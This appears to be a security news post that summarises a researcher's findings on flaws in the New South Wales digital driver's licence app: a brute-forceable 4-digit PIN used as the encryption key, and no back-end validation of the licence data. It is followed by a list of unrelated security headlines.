The New South Wales digital driver’s license has multiple implementation flaws that allow for easy forgeries.
This file is encrypted using AES-256-CBC encryption combined with Base64 encoding.
A 4-digit application PIN (which gets set during the initial onboarding when a user first instals the application) is the encryption password used to protect or encrypt the licence data.
The problem here is that an attacker who has access to the encrypted licence data (whether that be through accessing a phone backup, direct access to the device or remote compromise) could easily brute-force this 4-digit PIN by using a script that would try all 10,000 combinations….
[…]
The second design flaw that is favourable for attackers is that the Digital Driver Licence data is never validated against the back-end authority which is the Service NSW API/database.
This means that the application has no native method to validate the Digital Driver Licence data that exists on the phone and thus cannot perform further actions such as warn users when this data has been modified.
As the Digital Licence is stored on the client’s device, validation should take place to ensure the local copy of the data actually matches the Digital Driver’s Licence data that was originally downloaded from the Service NSW API.
As this verification does not take place, an attacker is able to display the edited data on the Service NSW application without any preventative factors.
There’s a lot more in the blog post.
More Stories
14 Million Patients Impacted by US Healthcare Data Breaches in 2024
SonicWall found that data breaches caused by malware attacks on US healthcare organizations have affected 14 million people so far...
#GartnerSEC: Zero Failure Tolerance, A Cybersecurity Myth Holding Back Organizations
Cybersecurity leaders should prioritize response and recovery over prevention to effectively navigate the ever-evolving threat landscape, according to Gartner analysts...
Citing security fears, Ukraine bans Telegram on government and military devices
The government of Ukraine imposed a ban on the Telegram messaging app being used on official devices belonging to government...
Israel’s Pager Attacks and Supply Chain Vulnerabilities
Israel’s brazen attacks on Hezbollah last week, in which hundreds of pagers and two-way radios exploded and killed at least...
US Mulls Ban on Russian, Chinese Parts in Connected Vehicles
The US Commerce Department wants to prohibit the sale or import of connected vehicles with Russian or Chinese-made hardware and...
Two men arrested one month after $230 million of cryptocurrency stolen from a single victim
Two men have been arrested by the FBI and charged in relation to their alleged involvement in a scam which...